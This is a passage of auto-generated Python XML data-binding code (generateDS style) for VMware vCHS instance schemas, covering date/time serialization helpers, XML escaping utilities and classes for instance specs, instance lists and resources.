            for value in values:
                if value not in ('true', '1', 'false', '0', ):
                    raise_parse_error(
                        node,
                        'Requires sequence of booleans '
                        '("true", "1", "false", "0")')
            return input_data
        def gds_validate_datetime(self, input_data, node, input_name=''):
            return input_data
        def gds_format_datetime(self, input_data, input_name=''):
            # Emit ISO-8601 'YYYY-MM-DDTHH:MM:SS[.ffffff][offset]';
            # microseconds are omitted when zero, and a UTC offset is
            # rendered as 'Z' or '+HH:MM'/'-HH:MM'.
            if input_data.microsecond == 0:
                _svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
                    input_data.year,
                    input_data.month,
                    input_data.day,
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                )
            else:
                _svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
                    input_data.year,
                    input_data.month,
                    input_data.day,
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                    ('%f' % (float(input_data.microsecond) / 1000000))[2:],
                )
            if input_data.tzinfo is not None:
                tzoff = input_data.tzinfo.utcoffset(input_data)
                if tzoff is not None:
                    # timedelta normalizes to (days, seconds); recombine
                    # so negative offsets come out negative.
                    total_seconds = tzoff.seconds + (86400 * tzoff.days)
                    if total_seconds == 0:
                        _svalue += 'Z'
                    else:
                        if total_seconds < 0:
                            _svalue += '-'
                            total_seconds *= -1
                        else:
                            _svalue += '+'
                        hours = total_seconds // 3600
                        minutes = (total_seconds - (hours * 3600)) // 60
                        _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            return _svalue
        @classmethod
        def gds_parse_datetime(cls, input_data):
            # Accepts a trailing 'Z' or '+HH:MM'/'-HH:MM' offset and
            # returns an aware datetime when one is present.
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            time_parts = input_data.split('.')
            if len(time_parts) > 1:
                # Normalize fractional seconds to integer microseconds
                # before handing to strptime's %f.
                micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
                input_data = '%s.%s' % (time_parts[0], micro_seconds, )
                dt = datetime_.datetime.strptime(
                    input_data, '%Y-%m-%dT%H:%M:%S.%f')
            else:
                dt = datetime_.datetime.strptime(
                    input_data, '%Y-%m-%dT%H:%M:%S')
            dt = dt.replace(tzinfo=tz)
            return dt
        def gds_validate_date(self, input_data, node, input_name=''):
            return input_data
        def gds_format_date(self, input_data, input_name=''):
            # Emit 'YYYY-MM-DD' with an optional timezone suffix.
            _svalue = '%04d-%02d-%02d' % (
                input_data.year,
                input_data.month,
                input_data.day,
            )
            try:
                # Plain date objects have no tzinfo attribute; the
                # AttributeError is expected and silently ignored.
                if input_data.tzinfo is not None:
                    tzoff = input_data.tzinfo.utcoffset(input_data)
                    if tzoff is not None:
                        total_seconds = tzoff.seconds + (86400 * tzoff.days)
                        if total_seconds == 0:
                            _svalue += 'Z'
                        else:
                            if total_seconds < 0:
                                _svalue += '-'
                                total_seconds *= -1
                            else:
                                _svalue += '+'
                            hours = total_seconds // 3600
                            minutes = (total_seconds - (hours * 3600)) // 60
                            _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            except AttributeError:
                pass
            return _svalue
        @classmethod
        def gds_parse_date(cls, input_data):
            # Strip any trailing 'Z'/offset, then parse 'YYYY-MM-DD'.
            # The parsed timezone only affects intermediate state; the
            # returned value is a naive datetime.date.
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
            dt = dt.replace(tzinfo=tz)
            return dt.date()
        def gds_validate_time(self, input_data, node, input_name=''):
            return input_data
        def gds_format_time(self, input_data, input_name=''):
            # Emit 'HH:MM:SS[.ffffff][offset]'; mirrors gds_format_datetime.
            if input_data.microsecond == 0:
                _svalue = '%02d:%02d:%02d' % (
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                )
            else:
                _svalue = '%02d:%02d:%02d.%s' % (
                    input_data.hour,
                    input_data.minute,
                    input_data.second,
                    ('%f' % (float(input_data.microsecond) / 1000000))[2:],
                )
            if input_data.tzinfo is not None:
                tzoff = input_data.tzinfo.utcoffset(input_data)
                if tzoff is not None:
                    total_seconds = tzoff.seconds + (86400 * tzoff.days)
                    if total_seconds == 0:
                        _svalue += 'Z'
                    else:
                        if total_seconds < 0:
                            _svalue += '-'
                            total_seconds *= -1
                        else:
                            _svalue += '+'
                        hours = total_seconds // 3600
                        minutes = (total_seconds - (hours * 3600)) // 60
                        _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            return _svalue
        @classmethod
        def gds_parse_time(cls, input_data):
            # Accepts an optional trailing 'Z'/offset; returns an aware
            # datetime.time when one was present.
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            if len(input_data.split('.')) > 1:
                dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
            else:
                dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
            dt = dt.replace(tzinfo=tz)
            return dt.time()
        def gds_str_lower(self, instring):
            return instring.lower()
        def get_path_(self, node):
            # Build a '/'-joined path of tag names from the root down to
            # *node*.  Relies on getparent(), so lxml only.
            path_list = []
            self.get_path_list_(node, path_list)
            path_list.reverse()
            path = '/'.join(path_list)
            return path
        # Strips a '{namespace}' prefix from an lxml tag name.
        Tag_strip_pattern_ = re_.compile(r'\{.*\}')
        def get_path_list_(self, node, path_list):
            # Recursively append tag names from *node* up to the root.
            if node is None:
                return
            tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
            if tag:
                path_list.append(tag)
            self.get_path_list_(node.getparent(), path_list)
        def get_class_obj_(self, node, default_class=None):
            # Resolve an xsi:type attribute to a generated class object in
            # this module's globals, falling back to *default_class*.
            # Relies on node.nsmap, so lxml only.
            class_obj1 = default_class
            if 'xsi' in node.nsmap:
                classname = node.get('{%s}type' % node.nsmap['xsi'])
                if classname is not None:
                    names = classname.split(':')
                    if len(names) == 2:
                        classname = names[1]
                    class_obj2 = globals().get(classname)
                    if class_obj2 is not None:
                        class_obj1 = class_obj2
            return class_obj1
        def gds_build_any(self, node, type_name=None):
            # Hook for xs:any content; the default implementation ignores it.
            return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
#
# Globals
#
# Encoding applied when string values are .encode()d for XML output.
ExternalEncoding = 'ascii'
# Splits a tag into an optional '{namespace}' prefix and the local name.
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
# Collapses runs of whitespace/newlines to a single token boundary.
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
# Captures the namespace URI and local name from '{uri}name'.
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
    """Write four spaces per nesting *level* to *outfile* when pretty-printing."""
    if pretty_print:
        outfile.write('    ' * level)
def quote_xml(inStr):
    """Escape &, < and > in *inStr* for use as XML element text.

    Falsy input (None, '', 0) serializes to the empty string; non-string
    input is first converted with '%s' formatting.
    """
    if not inStr:
        return ''
    # Bug fix: the original tested the Python-2-only name `basestring`,
    # raising NameError on Python 3.  '%s' formatting is the identity
    # for strings and converts everything else, so the check is
    # unnecessary on either version.
    s1 = '%s' % inStr
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    return s1
def quote_attrib(inStr):
    """Escape *inStr* and wrap it in quotes for use as an XML attribute.

    Double quotes are preferred; single quotes are used when the value
    contains a double quote (and &quot; escaping when it contains both).
    """
    # Bug fix: the original used the Python-2-only `basestring` in an
    # `and/or` conditional; '%s' formatting is behavior-identical (the
    # identity for strings) and works on Python 2 and 3.
    s1 = '%s' % inStr
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
    if '"' in s1:
        if "'" in s1:
            s1 = '"%s"' % s1.replace('"', "&quot;")
        else:
            s1 = "'%s'" % s1
    else:
        s1 = '"%s"' % s1
    return s1
def quote_python(inStr):
    """Return *inStr* rendered as a quoted Python string literal.

    Single quotes are preferred; double (or triple) quotes are chosen
    when the value contains single quotes (or newlines).
    """
    text = inStr
    if text.find("'") == -1:
        if text.find('\n') == -1:
            return "'%s'" % text
        return "'''%s'''" % text
    if text.find('"') != -1:
        text = text.replace('"', '\\"')
    if text.find('\n') == -1:
        return '"%s"' % text
    return '"""%s"""' % text
def get_all_text_(node):
    """Collect the text content of *node*: its own .text followed by the
    .tail text of each direct child (mixed-content flattening)."""
    text = node.text if node.text is not None else ''
    for child in node:
        if child.tail is not None:
            text += child.tail
    return text
def find_attr_value_(attr_name, node):
    """Look up an attribute value on *node* by name.

    A plain name is looked up directly; a 'prefix:name' is resolved to
    '{namespace}name' via the node's nsmap (lxml only).  Returns None
    when the attribute is absent or the prefix is unknown.
    """
    attrs = node.attrib
    parts = attr_name.split(':')
    if len(parts) == 1:
        return attrs.get(attr_name)
    if len(parts) == 2:
        prefix, name = parts
        namespace = node.nsmap.get(prefix)
        if namespace is not None:
            return attrs.get('{%s}%s' % (namespace, name, ))
    return None
class GDSParseError(Exception):
    """Raised when XML content fails generateDS parsing/validation."""
    pass
def raise_parse_error(node, msg):
    # Raise GDSParseError with element context; the source line number is
    # only available when the lxml backend is active (node.sourceline).
    if XMLParser_import_library == XMLParser_import_lxml:
        msg = '%s (element %s/line %d)' % (
            msg, node.tag, node.sourceline, )
    else:
        msg = '%s (element %s)' % (msg, node.tag, )
    raise GDSParseError(msg)
class MixedContainer:
    """Holds one piece of mixed XML content (interleaved text, a simple
    value, or a nested complex object) plus category/type tags used to
    reproduce the original interleaving on export."""
    # Constants for category:
    CategoryNone = 0
    CategoryText = 1
    CategorySimple = 2
    CategoryComplex = 3
    # Constants for content_type:
    TypeNone = 0
    TypeText = 1
    TypeString = 2
    TypeInteger = 3
    TypeFloat = 4
    TypeDecimal = 5
    TypeDouble = 6
    TypeBoolean = 7
    TypeBase64 = 8
    def __init__(self, category, content_type, name, value):
        self.category = category
        self.content_type = content_type
        self.name = name
        self.value = value
    def getCategory(self):
        return self.category
    # NOTE(review): the content_type parameter below is unused; kept for
    # interface stability with other generated code.
    def getContenttype(self, content_type):
        return self.content_type
    def getValue(self):
        return self.value
    def getName(self):
        return self.name
    def export(self, outfile, level, name, namespace, pretty_print=True):
        # Dispatch on category: raw text, a simple typed element, or a
        # nested generated object.
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                outfile.write(self.value)
        elif self.category == MixedContainer.CategorySimple:
            self.exportSimple(outfile, level, name)
        else:    # category == MixedContainer.CategoryComplex
            self.value.export(outfile, level, namespace, name, pretty_print)
    def exportSimple(self, outfile, level, name):
        # Write '<name>value</name>' with the %-format chosen by type.
        if self.content_type == MixedContainer.TypeString:
            outfile.write('<%s>%s</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeInteger or \
                self.content_type == MixedContainer.TypeBoolean:
            outfile.write('<%s>%d</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeFloat or \
                self.content_type == MixedContainer.TypeDecimal:
            outfile.write('<%s>%f</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeDouble:
            outfile.write('<%s>%g</%s>' % (
                self.name, self.value, self.name))
        elif self.content_type == MixedContainer.TypeBase64:
            outfile.write('<%s>%s</%s>' % (
                self.name, base64.b64encode(self.value), self.name))
    def to_etree(self, element):
        # Append this content to an existing etree *element*, attaching
        # text to the previous sibling's tail (or the parent's text).
        if self.category == MixedContainer.CategoryText:
            # Prevent exporting empty content as empty lines.
            if self.value.strip():
                if len(element) > 0:
                    if element[-1].tail is None:
                        element[-1].tail = self.value
                    else:
                        element[-1].tail += self.value
                else:
                    if element.text is None:
                        element.text = self.value
                    else:
                        element.text += self.value
        elif self.category == MixedContainer.CategorySimple:
            subelement = etree_.SubElement(element, '%s' % self.name)
            subelement.text = self.to_etree_simple()
        else:    # category == MixedContainer.CategoryComplex
            self.value.to_etree(element)
    def to_etree_simple(self):
        # NOTE(review): no branch handles TypeText/TypeNone, so `text`
        # would be unbound for those types — confirm callers never pass
        # them here.
        if self.content_type == MixedContainer.TypeString:
            text = self.value
        elif (self.content_type == MixedContainer.TypeInteger or
                self.content_type == MixedContainer.TypeBoolean):
            text = '%d' % self.value
        elif (self.content_type == MixedContainer.TypeFloat or
                self.content_type == MixedContainer.TypeDecimal):
            text = '%f' % self.value
        elif self.content_type == MixedContainer.TypeDouble:
            text = '%g' % self.value
        elif self.content_type == MixedContainer.TypeBase64:
            text = '%s' % base64.b64encode(self.value)
        return text
    def exportLiteral(self, outfile, level, name):
        # Emit a Python-constructor-style literal for this container.
        if self.category == MixedContainer.CategoryText:
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
                    self.category, self.content_type, self.name, self.value))
        elif self.category == MixedContainer.CategorySimple:
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
                    self.category, self.content_type, self.name, self.value))
        else:    # category == MixedContainer.CategoryComplex
            showIndent(outfile, level)
            outfile.write(
                'model_.MixedContainer(%d, %d, "%s",\n' % (
                    self.category, self.content_type, self.name,))
            self.value.exportLiteral(outfile, level + 1)
            showIndent(outfile, level)
            outfile.write(')\n')
class MemberSpec_(object):
    """Describes one member of a generated class: its name, its XSD data
    type (or restriction chain of types), and a container flag."""
    def __init__(self, name='', data_type='', container=0):
        self.name = name
        self.data_type = data_type
        self.container = container
    def set_name(self, name):
        self.name = name
    def get_name(self):
        return self.name
    def set_data_type(self, data_type):
        self.data_type = data_type
    def get_data_type_chain(self):
        # The raw value: either a single type or the full chain (list).
        return self.data_type
    def get_data_type(self):
        # A list holds a restriction chain; its last entry is the
        # effective type.  An empty chain falls back to xs:string.
        if not isinstance(self.data_type, list):
            return self.data_type
        return self.data_type[-1] if self.data_type else 'xs:string'
    def set_container(self, container):
        self.container = container
    def get_container(self):
        return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class InstanceSpecParamsType(GeneratedsSuper):
    """5.7 Input parameters for creation of instance. Requires details like
    service group id, plan id, name of the instance, etc."""
    # Assigning a class to `subclass` makes factory() build that class
    # instead; `superclass` records the XSD base type (none here).
    subclass = None
    superclass = None
    def __init__(self, name=None, description=None, planId=None, serviceGroupId=None, instanceSpec=None, instanceDefaultSpec=None, bindingSpec=None):
        # Remembers the tag this object was parsed from, so export()
        # round-trips the original element name.
        self.original_tagname_ = None
        self.name = name
        self.description = description
        self.planId = planId
        self.serviceGroupId = serviceGroupId
        self.instanceSpec = instanceSpec
        self.instanceDefaultSpec = instanceDefaultSpec
        self.bindingSpec = bindingSpec
    def factory(*args_, **kwargs_):
        # Build the user-registered subclass when one is present.
        if InstanceSpecParamsType.subclass:
            return InstanceSpecParamsType.subclass(*args_, **kwargs_)
        else:
            return InstanceSpecParamsType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_name(self): return self.name
    def set_name(self, name): self.name = name
    def get_description(self): return self.description
    def set_description(self, description): self.description = description
    def get_planId(self): return self.planId
    def set_planId(self, planId): self.planId = planId
    def get_serviceGroupId(self): return self.serviceGroupId
    def set_serviceGroupId(self, serviceGroupId): self.serviceGroupId = serviceGroupId
    def get_instanceSpec(self): return self.instanceSpec
    def set_instanceSpec(self, instanceSpec): self.instanceSpec = instanceSpec
    def get_instanceDefaultSpec(self): return self.instanceDefaultSpec
    def set_instanceDefaultSpec(self, instanceDefaultSpec): self.instanceDefaultSpec = instanceDefaultSpec
    def get_bindingSpec(self): return self.bindingSpec
    def set_bindingSpec(self, bindingSpec): self.bindingSpec = bindingSpec
    def validate_NonEmptyString(self, value):
        # Validate type NonEmptyString, a restriction on xs:string.
        pass
    def hasContent_(self):
        # True when at least one child element would be serialized.
        if (
            self.name is not None or
            self.description is not None or
            self.planId is not None or
            self.serviceGroupId is not None or
            self.instanceSpec is not None or
            self.instanceDefaultSpec is not None or
            self.bindingSpec is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='instance:', name_='InstanceSpecParamsType', namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1" xmlns:common="http://www.vmware.com/vchs/sc/common/v1" ', pretty_print=True):
        # Serialize this object (and its children) as XML to *outfile*.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='InstanceSpecParamsType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='instance:', name_='InstanceSpecParamsType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # Self-closing element when there is nothing to nest.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='InstanceSpecParamsType'):
        # This type declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='instance:', name_='InstanceSpecParamsType', fromsubclass_=False, pretty_print=True):
        # Emit each non-None child as '<instance:tag>text</instance:tag>'.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.name is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sname>%s</%sname>%s' % (namespace_, self.gds_format_string(quote_xml(self.name).encode(ExternalEncoding), input_name='name'), namespace_, eol_))
        if self.description is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sdescription>%s</%sdescription>%s' % (namespace_, self.gds_format_string(quote_xml(self.description).encode(ExternalEncoding), input_name='description'), namespace_, eol_))
        if self.planId is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%splanId>%s</%splanId>%s' % (namespace_, self.gds_format_string(quote_xml(self.planId).encode(ExternalEncoding), input_name='planId'), namespace_, eol_))
        if self.serviceGroupId is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sserviceGroupId>%s</%sserviceGroupId>%s' % (namespace_, self.gds_format_string(quote_xml(self.serviceGroupId).encode(ExternalEncoding), input_name='serviceGroupId'), namespace_, eol_))
        if self.instanceSpec is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sinstanceSpec>%s</%sinstanceSpec>%s' % (namespace_, self.gds_format_string(quote_xml(self.instanceSpec).encode(ExternalEncoding), input_name='instanceSpec'), namespace_, eol_))
        if self.instanceDefaultSpec is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sinstanceDefaultSpec>%s</%sinstanceDefaultSpec>%s' % (namespace_, self.gds_format_string(quote_xml(self.instanceDefaultSpec).encode(ExternalEncoding), input_name='instanceDefaultSpec'), namespace_, eol_))
        if self.bindingSpec is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%sbindingSpec>%s</%sbindingSpec>%s' % (namespace_, self.gds_format_string(quote_xml(self.bindingSpec).encode(ExternalEncoding), input_name='bindingSpec'), namespace_, eol_))
    def exportLiteral(self, outfile, level, name_='InstanceSpecParamsType'):
        # Emit a Python-constructor-style literal representation.
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        if self.name is not None:
            showIndent(outfile, level)
            outfile.write('name=%s,\n' % quote_python(self.name).encode(ExternalEncoding))
        if self.description is not None:
            showIndent(outfile, level)
            outfile.write('description=%s,\n' % quote_python(self.description).encode(ExternalEncoding))
        if self.planId is not None:
            showIndent(outfile, level)
            outfile.write('planId=%s,\n' % quote_python(self.planId).encode(ExternalEncoding))
        if self.serviceGroupId is not None:
            showIndent(outfile, level)
            outfile.write('serviceGroupId=%s,\n' % quote_python(self.serviceGroupId).encode(ExternalEncoding))
        if self.instanceSpec is not None:
            showIndent(outfile, level)
            outfile.write('instanceSpec=%s,\n' % quote_python(self.instanceSpec).encode(ExternalEncoding))
        if self.instanceDefaultSpec is not None:
            showIndent(outfile, level)
            outfile.write('instanceDefaultSpec=%s,\n' % quote_python(self.instanceDefaultSpec).encode(ExternalEncoding))
        if self.bindingSpec is not None:
            showIndent(outfile, level)
            outfile.write('bindingSpec=%s,\n' % quote_python(self.bindingSpec).encode(ExternalEncoding))
    def build(self, node):
        # Populate this instance from a parsed XML element node.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Map each child element's text onto the matching attribute.
        if nodeName_ == 'name':
            name_ = child_.text
            name_ = self.gds_validate_string(name_, node, 'name')
            self.name = name_
            self.validate_NonEmptyString(self.name)    # validate type NonEmptyString
        elif nodeName_ == 'description':
            description_ = child_.text
            description_ = self.gds_validate_string(description_, node, 'description')
            self.description = description_
            self.validate_NonEmptyString(self.description)    # validate type NonEmptyString
        elif nodeName_ == 'planId':
            planId_ = child_.text
            planId_ = self.gds_validate_string(planId_, node, 'planId')
            self.planId = planId_
            self.validate_NonEmptyString(self.planId)    # validate type NonEmptyString
        elif nodeName_ == 'serviceGroupId':
            serviceGroupId_ = child_.text
            serviceGroupId_ = self.gds_validate_string(serviceGroupId_, node, 'serviceGroupId')
            self.serviceGroupId = serviceGroupId_
            self.validate_NonEmptyString(self.serviceGroupId)    # validate type NonEmptyString
        elif nodeName_ == 'instanceSpec':
            instanceSpec_ = child_.text
            instanceSpec_ = self.gds_validate_string(instanceSpec_, node, 'instanceSpec')
            self.instanceSpec = instanceSpec_
            self.validate_NonEmptyString(self.instanceSpec)    # validate type NonEmptyString
        elif nodeName_ == 'instanceDefaultSpec':
            instanceDefaultSpec_ = child_.text
            instanceDefaultSpec_ = self.gds_validate_string(instanceDefaultSpec_, node, 'instanceDefaultSpec')
            self.instanceDefaultSpec = instanceDefaultSpec_
            self.validate_NonEmptyString(self.instanceDefaultSpec)    # validate type NonEmptyString
        elif nodeName_ == 'bindingSpec':
            bindingSpec_ = child_.text
            bindingSpec_ = self.gds_validate_string(bindingSpec_, node, 'bindingSpec')
            self.bindingSpec = bindingSpec_
            self.validate_NonEmptyString(self.bindingSpec)    # validate type NonEmptyString
# end class InstanceSpecParamsType
class InstanceListType(GeneratedsSuper):
    """5.7 Represents list of vCHS instances."""
    # Assigning a class to `subclass` makes factory() build that class.
    subclass = None
    superclass = None
    def __init__(self, instances=None):
        self.original_tagname_ = None
        # Never share a default list between instances.
        if instances is None:
            self.instances = []
        else:
            self.instances = instances
    def factory(*args_, **kwargs_):
        if InstanceListType.subclass:
            return InstanceListType.subclass(*args_, **kwargs_)
        else:
            return InstanceListType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_instances(self): return self.instances
    def set_instances(self, instances): self.instances = instances
    def add_instances(self, value): self.instances.append(value)
    def insert_instances_at(self, index, value): self.instances.insert(index, value)
    def replace_instances_at(self, index, value): self.instances[index] = value
    def hasContent_(self):
        # True when there is at least one instance to serialize.
        if (
            self.instances
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='instance:', name_='InstanceListType', namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1"', pretty_print=True):
        # Serialize this list element (and nested instances) as XML.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='InstanceListType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='instance:', name_='InstanceListType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='instance:', name_='InstanceListType'):
        # This type declares no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespace_='instance:', name_='InstanceListType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Each list entry serializes itself under the 'instances' tag.
        for instances_ in self.instances:
            instances_.export(outfile, level, namespace_, name_='instances', pretty_print=pretty_print)
    def exportLiteral(self, outfile, level, name_='InstanceListType'):
        # Emit a Python-constructor-style literal representation.
        level += 1
        already_processed = set()
        self.exportLiteralAttributes(outfile, level, already_processed, name_)
        if self.hasContent_():
            self.exportLiteralChildren(outfile, level, name_)
    def exportLiteralAttributes(self, outfile, level, already_processed, name_):
        pass
    def exportLiteralChildren(self, outfile, level, name_):
        showIndent(outfile, level)
        outfile.write('instances=[\n')
        level += 1
        for instances_ in self.instances:
            showIndent(outfile, level)
            outfile.write('model_.InstanceType(\n')
            instances_.exportLiteral(outfile, level, name_='InstanceType')
            showIndent(outfile, level)
            outfile.write('),\n')
        level -= 1
        showIndent(outfile, level)
        outfile.write('],\n')
    def build(self, node):
        # Populate this instance from a parsed XML element node.
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Each <instances> child becomes an InstanceType appended to the list.
        if nodeName_ == 'instances':
            obj_ = InstanceType.factory()
            obj_.build(child_)
            self.instances.append(obj_)
            obj_.original_tagname_ = 'instances'
# end class InstanceListType
class ResourceType(GeneratedsSuper):
    """The resource identifier.The value of this attribute uniquely
    identifies the resource, persists for the life of the entity,
    and is never reused. Contains the name of the the entity."""
    # Assigning a class to `subclass` makes factory() build that class.
    subclass = None
    superclass = None
    def __init__(self, id=None, name=None, link=None, extensiontype_=None):
        self.original_tagname_ = None
        # id/name are XML attributes; link is a list of child elements.
        self.id = _cast(None, id)
        self.name = _cast(None, name)
        if link is None:
            self.link = []
        else:
            self.link = link
        # When set, serialized as an xsi:type attribute (type extension).
        self.extensiontype_ = extensiontype_
    def factory(*args_, **kwargs_):
        if ResourceType.subclass:
            return ResourceType.subclass(*args_, **kwargs_)
        else:
            return ResourceType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_link(self): return self.link
    def set_link(self, link): self.link = link
    def add_link(self, value): self.link.append(value)
    def insert_link_at(self, index, value): self.link.insert(index, value)
    def replace_link_at(self, index, value): self.link[index] = value
    def get_id(self): return self.id
    def set_id(self, id): self.id = id
    def get_name(self): return self.name
    def set_name(self, name): self.name = name
    def get_extensiontype_(self): return self.extensiontype_
    def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
    def hasContent_(self):
        # True when there is at least one link child to serialize.
        if (
            self.link
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='instance:', name_='ResourceType', namespacedef_='xmlns:instance="http://www.vmware.com/vchs/sc/instance/v1" xmlns:common="http://www.vmware.com/vchs/sc/common/v1" ', pretty_print=True):
        # Serialize this resource (attributes plus link children) as XML.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='ResourceType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
